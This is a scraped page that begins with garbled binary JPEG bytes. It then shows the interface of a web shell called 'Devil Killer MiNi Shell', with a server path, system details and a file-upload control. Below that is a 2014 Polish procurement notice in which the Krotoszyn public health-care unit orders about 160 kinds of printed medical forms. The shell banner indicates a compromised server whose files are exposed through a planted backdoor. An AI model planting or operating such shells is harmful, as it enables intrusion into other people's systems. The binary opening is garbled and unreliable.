JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140110/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140110/11582-N-2014.html

<p class="kh_header"><b>Krotoszyn: DOSTAWA DRUKÓW I KSIĄŻEK MEDYCZNYCH DLA SPZOZ KROTOSZYN.</b><br>
<b>Numer ogłoszenia: 11582 - 2014; data zamieszczenia: 10.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Młyńska 2, 63-700 Krotoszyn, woj. wielkopolskie, tel. 062 5880390 w. 253, faks 062 5880402.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzoz.krotoszyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA DRUKÓW I KSIĄŻEK MEDYCZNYCH DLA SPZOZ KROTOSZYN..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> DOSTAWA DRUKÓW I KSIĄŻEK MEDYCZNYCH - PAKIET NR 1-2..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>DOSTAWA DRUKÓW I KSIĄŻEK MEDYCZNYCH, MAKSYMALNIE 20% ZAMÓWIENIA PODSTAWOWEGO.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 22.00.00.00-0, 22.11.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta winna zawierać wszystkie dokumenty i oświadczenia wymienione w rozdziale VI niniejszej SIWZ oraz : 
a.	Formularz ofertowy podpisany przez osobę upoważnioną do składania oświadczenia woli w imieniu wykonawcy z wykorzystaniem wzoru - załącznik nr 1.
b.	Formularz cenowy podpisany przez osobę upoważnioną do składania oświadczenia woli w imieniu wykonawcy z wykorzystaniem wzoru - załącznik nr 2. Do oferty należy dołączyć wypełnione Formularze cenowe również w formie elektronicznej (plik.xls) z niezablokowanymi formułami. Formularze cenowe w formie pliku.xls umieszczone są i dostępne do ściągnięcia na stronie internetowej Zamawiającego www.bip.spzoz.krotoszyn.pl .

W przypadku podpisania oferty oraz poświadczenia za zgodność z oryginałem kopii dokumentów przez osobę niewymienioną w dokumencie rejestracyjnym (ewidencyjnym) Wykonawcy, należy do oferty dołączyć stosowne pełnomocnictwo (oryginał lub kopia poświadczona za zgodność z oryginałem przez notariusza).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>§ 6 Projektu umowy: 2.	Strony ustalają możliwość zmiany cen wynikających z okoliczności, których nie można było przewidzieć w chwili zawarcia niniejszej umowy. Za okoliczność taką uważa się :
	-	ustawową zmianę stawek podatku VAT.
3.	W przypadku ustawowej zmiany stawki podatku VAT na przedmiot niniejszego zamówienia, jej zmiana 	następuje z mocy prawa, bez konieczności podpisywania oddzielnego aneksu do umowy. 
§13 Projektu umowy:2.Strony dopuszczają zmiany umowy w zakresie: 
-nazwy  i treści druku, 
-liczby kart w druku lub książce.
-przedłużenia terminu realizacji umowy do czasu wykorzystania przedmiotu umowy, do wartości nie większej niż całkowita wartość umowy, maksymalnie 12 miesięcy.

Powyższe zmiany nie mogą skutkować zmianą ceny jednostkowej i nie mogą być niekorzystne dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.spzoz.krotoszyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej ul. Młyńska 2 63-700 Krotoszyn Pokój nr 20..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.01.2014 godzina 09:00, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej ul. Młyńska 2 63-700 Krotoszyn Sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet 1 - druki medyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	F 0038 CPMiPZ	Ankieta dla kobiet objętych populacyjnym programem wczesnego wykrywania raka piersi bloczki nie klejone	80	A4 dwustr. kartki
2.	PL-02	Badanie przedmiotowe / badanie podmiotowe ogólne   bloczki nie klejone	200	A3 dwustr. kartki
3.	S-14-LC	Badanie w kierunku wirusowego zapalenia wątroby	60	A6 dwustr.
4.	Pr.31-Z01B	Bilet odbioru wyników - Bakter.	80	6 cm x 7 cm, dwustr.
5.	Pr.31-Z01A	Bilet odbioru wyników - Lab. Centr.	120	6 cm x 7 cm, dwustr.
6.	Pr.31-Z01C	Bilet odbioru wyników - Koźmin Wlkp.	5	6 cm x 7 cm, dwustr.
7.	F 0140	druk- po odbiór wyniku mammografii	30	A6 jednostr.
8.	Instr. nr 33.Z-01	druk potwierdzający dostarczenie należytych ilości posilków do kuchenek oddzialowych	5	A4 dwustr.
9.	F 0041	Elektrokardiogram	200	A4 dwustronne
10.	PL-03	Ginekologiczne badanie przedmiotowe 	40	A4 jednostr.
11.	PL-01	Historia choroby (szpital)	300	A3 dwustr.
12.	PL-21	Historia choroby SOR 	100	A4 jednostr. samokopia
13.	PP-01	Historia opieki pielęgniarskiej	120	A3 dwustr.
14.	PL-45	Historia rehabilitacji (str. 1-4)	12	A3 dwustr.
15.	PL-45	Historia rehabilitacji (str. 5-8) - badanie neurologiczne	12	A3 dwustr.
16.	PL-29	Historia zdrowia i choroby AMBULATORIUM	150	A5 2 strony dwustr. w poziomie łączone
17.	PL-29 A	Historia zdrowia i choroby AMBULATORIUM/WIECZORYNKA	150	A5 jednostr.
18.	PL-30	Historia zdrowia i choroby AMBULATORIUM - wkładka	150	A5 dwustr.
19.	F 0122 ZLU	Indywidualna karta zabiegów rehabilitacyjnych	50	A4 dwustr.
20.	F 0123 ZLU	Indywidualna karta zabiegów rehabilitacyjnych dla dzieci	50	A4 dwustr.
21.	PL-05	Indywidualna karta zleceń diagnostycznych  oddziału wewnętrznego	180	A4 dwustr.
22.	PL-04	Indywidualna karta zleceń lekarskich	600	A4 dwustr.
23.	PL-04A	Indywidualna karta zleceń lekarskich 	100	A3 dwustr.
24.	F 0118 AOS	Informacja dla lekarza kierującego	180	A5 samokopia
25.	F 0131 POŁ-GIN	Informacja dla pacjentki oraz formularz świadomej zgody na operacyjne rozwiązanie ciąży metodą cięcia cesarskiego	4	A3 dwustr.
26.	Instr.32 Z-01	Karta badania histopatologicznego	35	A5 dwustr.
27.	F 0091 CPMiPZ	Karta badania mammograficznego- Program prof.raka piersi	30	A4 jednostr.
28.	PL-10	Karta badań laboratoryjnych. ODDZ. AiIT	20	A3 dwustr.
29.	F 0099	Karta bilansu płynów	60	A4 dwustr.
30.	F 0048	Karta chorób narządu rodnego- karta ginekologiczna	8	A4 jednostr.
31.	F 0049	Karta ciąży  bloczki nie klejone	4	A3 dwustr.
32.	F 0115 AOS	Karta dawkowania leków-POR.DIABET.	10	A5 dwustr.
33.	Pr 25. Z-01	Karta depozytowa - przedmiotów wartościowych 	5	A5 samokopia
34.	AD 079	Karta drogowa	70	A5 dwustronna, NUMEROWANA
35.	AD 003	Karta ewidencji czasu pracy pracownika	5	A4 / sztywna
36.	PL-08	Karta gorączkowa niemowlęcia	20	A4 dwustr.
37.	PL-07	Karta gorączkowa ogólna	170	A4 dwustr.
38.	PL-09	Karta gorączkowa położnicza- ODDZ.GIN-POŁ	30	A4 dwustr.
39.	F 0052 PSPR	Karta informacyjna nr (pogotowie)	20	A6 jednostronna
40.	Pr 20. Z-01	Karta informacyjna z leczenia szpitalnego - Bloczki nie klejone	600	A4 jednostr. KARTKI
41.	F 0055	Karta konsultacji	100	A4 dwustr.
42.	F 0057 DZIEC.	Karta laboratoryjna badania moczu/ oddz. dziec.	10	A4 dwustr.
43.	PL-39 A	karta medycznych czynności ratunkowych zał. nr 4 	200	A4 samokopia
44.	PL-31	Karta noworodka	10	A4 dwustr.
45.	PL-11A	Karta obserwacji - SOR	120	A4 dwustr.
46.	PL-11	Karta obserwacji lekarskich	250	A4 dwustr.
47.	PL-12	Karta obserwacji porodu (ODDZ.GIN-POŁ zał. nr 2)	10	A3 jednostr.
48.	PL-23	Karta obserwacji skóry noworodka 1-4 doby	6	A4 dwustr.
49.	Pr 11 ZKZS-Z.03	Karta obserwacji wkłuć obwodowych	150	A4 dwustr.
50.	F 0101	Karta obserwacji wybranych parametrów	60	A4 dwustr.
51.	PL-13 A	Karta obserwacji przebiegu choroby (IOM)	10	A4 dwustr
52.	Pr 11 ZKZS-Z.01	karta obserwacji centralnego dostępu żylnego 	5	A4 dwustr.
53.	PL-43	Karta oceny przebiegu programu rehabilitacji	15	A4 jednostr.
54.	ZOL/ZOP	Karta oceny swiadczeniobiorcy kierowanego do zakładu opiekuńczego/ przebywająceo w zakładzie opiekuńczym A4	15	A4 dwustr.
55.	PP-07	Karta opieki pielęgniarskiej - ODDZ. WEW.	100	A3 dwustr. 
56.	PP-08	Karta opieki pielęgniarskiej  ODDZ.DZIECIĘCY	20	A4 dwustr.
57.	PP-09	Karta opieki pielęgniarskiej - ODDZ.NOWORODKOWY	10	A4 dwustr.
58.	PP-19	Karta opieki pielęgniarskiej o/rehabilitacyjnego	30	A4 dwustr.
59.	PP-04	Karta opieki pielęgniarskiej -ODDZ. CHIR.	45	A3 dwustr. 
60.	PP-11	Karta opieki pielęgniarskiej- ODDZ.POŁ-GIN	30	A4 dwustr.
61.	PP-05	Karta opieki pielęgniarskiej.ODDZ. AiIT	25	A3 dwustr.
62.	PP-20	Karta pielęgnacji pacjenta SOR	120	A4 dwustr.
63.	Pr 57. Z-01	karta pielęgnacji pacjenta z odleżynami	20	A4 dwustr.
64.	PL-14	Karta położnicza	20	A3 dwustr.
65.	F 0144 O/REH	Karta pracy psychologicznej z pacjentem	12	A4 jednostr.
66.	Pr 55. Z-01(wyd2)	Karta praw i obowiązków pacjenta	150	A4 dwustr.
67.	Pr.33 Z-01	Karta skierowania zwlok do chlodni	20	A4 samokopia
68.	F 0143 O/REH	Karta terapii logopedycznej	10	A4 jednostr.
69.	F 0003 NOWOR.	Karta uodpornienia/ Oddz. Nowor.	15	A4 dwustronna sztywna
70.	PL-49 ZOL/ZOP	Karta usprawniania pacjenta 	10	A3 dwustr.
71.	F 0023	Karta wyników badań laboratoryjnych-POR.DIABET.	20	A4 jednostronne
72.	F 0024	Karta wyników dodatkowych badań laboratoryjnych	20	A4 jednostronne
73.	F 0120 ZLU	Karta zabiegów /ZLU	90	A4 dwustr.
74.	F 0062	Karta zgłoszenia nowotworu złośliwego	10	A4 jednostr.
75.	MZ/2001	Karta zgonu (karta statystyczna do karty zgonu)	20	A4 dwustr.
76.	PL-50	Karta zleceń  - SOR	120	A4 dwustr.
77.	PL-17	Karta zleceń lekarski oddziału AiIT	25	A3 dwustr.
78.	PL-44	Karta zleceń i realizacji zabiegów fizjoterapeutycznych 	12	A3 dwustr.
79.	PL-18	Karta znieczulenia SP ZOZ Krotoszyn	70	A4 samokopia
80.	F 0096 POŁ-GIN	Kontrola czynności serca płodu i ciś.tętniczego krwi ciężarnej- ODDZ.GIN-POŁ	30	A4 dwustr. 
81.	F 0151	kontrola poziomu cukru we krwi	10	A4 dwustr.
82.	AD 005	LISTA OBECNOŚCI W PRACY	10	A4 dwustronne
83.	Instr.2 Dz.G.A	Magazyn wyda 	40	A5 samokopia
84.	F 01 ZPDO	Miesięczne zestawienie badań wykonanych w ZPDO 	50	A4 dwustr.
85.	PP-12	Obserwacje pielęgniarskie	200	A4 dwustr.
86.	F 0127 ZLU	Ocena rozwoju ruchowego dziecka poniżej 1 roku życia	30	A4 dwustr.
87.	F 0146	Ocena ryzyka związanego ze stanem odżywienia (nutritional risk score, nrs)	150	A4 jednostr.
88.	F 0067	Ogólnopolski rejestr ostrych zespołów wieńcowych	15	A4 jednostr.
89.	F 0071	Pisemne zgłoszenie urodzenia dziecka- ODDZ.GIN-POŁ	10	A4 dwustr.
90.	PP-17	Plan pielęgnowania i karta czynności pielęgnacyjnych ZOL/ZOP zał nr 3- bloczki nie klejone	5	A3 dwustr.
91.	AD 006	Polecenie wyjazdu służbowego	5	A5 dwustr.
92.	PL-44A	Program rehabilitacji	12	A4 dwustr.
93.	Pr 48. Z-03	Protokół pielęgniarki operacyjnej- SALA PORODOWA, BLOK OPER.	25	A4 jednostr.
94.	Zarz.Dyr.17/03	Protokół przekazania pacjenta	150	A5 jednostr.
95.	PL-40	Przedoperacyjna ankieta anestezjologiczna	30	A3 dwustr.
96.	AD 001	Roczna karta ewidencji obecności w pracy	5	A4, SZTYWNA, dwustr.
97.	AD 076	Rozkład pracy dla pielęgniarek, salowych	20	A4 jednostr.
98.	PL-46	Skala ASIA-Standardowa klasyfikacja neurologiczna uszkodzeń rdzenia kręgowego	15	A4 dwustr.
99.	F 0109 AOS	Skala Tiss - 28 interwencja terapeutyczna	10	A4 DWUSTR.
100.	PL46A	Skale oceny pacjenta - o.reh	12	A4 dwustr.
101.	S-07	Skierowanie do poradni specjalistycznej 	200	A5 jednostr.
102.	S-20-ZPDO	Skierowanie do pracowni diagnostycznej /rtg, usg, endosk./	70	A5 jednostr.
103.	S-22-ZPDO	Skierowanie do pracowni rezonansu magnetycznego /tomografii komputerowej	50	A4 dwustr.
104.	S-01	Skierowanie do szpitala /informacja dla lekarza kierującego	100	A4 jednostr.
105.	S-02	Skierowanie do szpitala psychiatrycznego	5	A4 jednostr.
106.	Pr 37. Z-02	Zlecenie na wykonanie badań immunohematologicznych kwalifikujących do podania Immunoglobuliny ANTY-D	4	A5 jednostr.
107.	Pr 37. Z-03	Zlecenie na badanie grupy krwi	100	A5 jednostr.
108.	Pr 37. Z-05	Zlecenie na krew do pilnej transfuzji	10	A5 jednostr.
109.	S-03	Skierowanie na leczenie uzdrowiskowe	4	A4 dwustr.
110.	Pr 37. Z-04	Zlecenie na wykonanie próby zgodności 	100	A5 jednostr.
111.	S-18-ZLU	Skierowanie na zabiegi fizjoterapeutyczne	50	A5 jednostr.
112.	Pr 25. Z-02	Spis rzeczy (garderoby) pacjenta (kwit depozytowt)  	30	A5 samokopia
113.	F 0098 ZPDO (Instr.6 Z-01)	świadoma zgoda pacjenta na wykonanie badania tomografii komputerowej	50	A4 dwustr.
114.	F 0014A	Upoważnienie - do odbioru dokumentacji	200	A4 jednostr.
115.	F 0112 AOS	Waga pacjenta- POR.DIABET.	20	A5 dwustr.
116.	F 0113 AOS	Wkładka do historii choroby (diabetologia)	20	A4 dwustr.
117.	AD 014	Wniosek o udzielenie opieki nad dzieckiem do lat 14	5	A5 jednostr.
118.	AD 071	Wniosek o udzielenie pożyczki PKZP	10	A5 jednostr.
119.	AD 009	wniosek o udzielenie urlopu	50	A5 jednostr.
120.	W-25-LC	Wynik badania - krew obwodowa	5	A6 jednostr.
121.	W-02-LC	Wynik badania cytologicznego szyjki macicy	30	A5 jednostr.
122.	W-21-LC	Wynik badania kału na krew utajoną	5	A6 jednostr.
123.	W-13-LC	Wynik badania kału na obecność pasożytów	10	A6 jednostr.
124.	W-12-LC	Wynik badania kału na resztki pokarmowe	5	A6 jednostr.
125.	W-03-LC	Wynik badania laboratoryjnego / pusty /	40	A6jednostr.
126.	W-11-LC	Wynik badania laboratoryjnego- IgE CAŁKOWITE	5	A6 jednostr.
127.	W-05-LC	Wynik badania laboratoryjnego- seromukoid	5	A6 jednostr.
128.	W-24-LC	Wynik badania- mocz	400	A5 jednostr.
129.	F 0145	Wynik badania psychologicznego - bloczki nie klejone	40	A4 dwustr. 
130.	W-23-LC	Wynik badania-glukoza we krwi	400	A5 jednostr.
131.	W-22-LC	Wynik badanie kału na obecność cyst Lamblii Intestinalis	5	A6 jednostr.
132.	W-19-LC	Wynik badania poziomu hormonów płciowych 	7	A6 jednostr.
133.	F 0097 POŁ-GIN	Wyniki badań laboratoryjnych-ODDZ.GIN-POŁ	25	A4 dwustr. 
134.	F 0021	Wyniki laboratoryjne- Oddz. Nowor.	10	A4 jednostronne
135.	W-20-LC	Wywiad do grupy krwi i przeciwciał	15	A6 jednostr.
136.	F 0152	Wywiad epidemiologiczny	250	A4 jednostr.
137.	PP-02	Wywiad pielęgniarski - bloczki nie klejone	100	A3 dwustr. kartki
138.	Pr 37. Z-01	Zamówienie indywidualne na krew i jej składniki	100	A5 jednostr.
139.	F 0025	Zapotrzebowanie na leki nr 	40	A5 bl samokopia
140.	F 0025a	Zapotrzebowanie na leki nr 	10	A4 bl samokopia
141.	F 0153	zaswiadczenie o przeprowadzonym lekarskim badaniu kwalifikacyjnym	5	A4 jednostr.
142.	F 0028	Zaświadczenie lekarskie 	100	A5 jednostr.
143.	F 0149	zaświadczenie nr  (o pobycie w szpitalu)	15	A5 jednostr.
144.	PP-13	Zbiorcza uproszczona ocena stanu chorego i efektywności opieki  (ZOP)	15	A4 dwustr.
145.	Zarz.Dyr.	Zgoda pacjenta na zabieg operacyjny / badanie diagnostyczne	100	A4dwustronna
146.	F 0079	Zlecenie na transport sanitarny	100	A5 jednostr
147.	F 0081	Zlecenie na zabiegi dokonywane przez felczerów / pielęgniarki	5	A5 dwustr.
148.	NFZ-2	Zlecenie na zaopatrzenie w wwyroby medyczne będące przedmiotami ortopedycznymi  i środki pomocnicze	40	A4 dwustr.
149.	S-16-LC	Skierowanie na badania laboratoryjne	700	A5 jednostr.
150.	S-17-LC	Zlecenie wykonania badań mikrobiologicznych w pracowni bakteriologicznej SP ZOZ Krotoszyn	120	A5 jednostr.
151.	F 0089	Zlecenie wykonania konsultacji 	10	A5 jednostr.
152.	PL-51	Karta przebiegu realizacji programu rehabilitacji	10	A4 dwustr.
153.	Pr 37.Z-09	Karta obserwacji pacjenta, u którego przetaczana jest krew lub jej składniki	15	A4 dwustronne
154.	Pr 37.Z-08	Zlecenie na konsultacyjne badanie immunohematologiczne	5	A4 jednostronne
155.	PL-18A	Protokół przekazania chorego operowanego	31	A4 samokopia
156.	Pr 48. Z-01	Karta sterylizacji	15	A4 jednostronne 
157.	AD 051	Prośba (wydanie dokumentacji medycznej)	70	A4 jednostr.
158.	AD 036	Skierowanie na badania prof.	10	A5 dwustr.
159.	W-26-LC	Wynik badania- czynnik reumatoidalny-RF	5	A6 jednostr.
160.	F 0100 CPMiPZ	Ankieta dla kobiet objętych populacyjnym programem wczesnego wykrywania raka szyjki macicy	20	A4 jednostr.

Wymagania dotyczące druków:
1.Bloczek powinien zawierć 100 kartek.
2. Oznakowanie druków zgodnie z kolumną nr 2 (symbol) w dolnym lewym lub prawym rogu .
3. Bloczki przekładane przekładką.
4. Druki powinny być wykonane na papierze offsetowym o gramaturze 80g/m2.
5. Druki samokopiujące - pozycje nr: 12, 24, 33, 43, 67, 79, 83, 112, 139, 140, 155.
Druki - pozycja nr: 35, 69 i 96 - karton..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.00.00.00-0.</p></li>
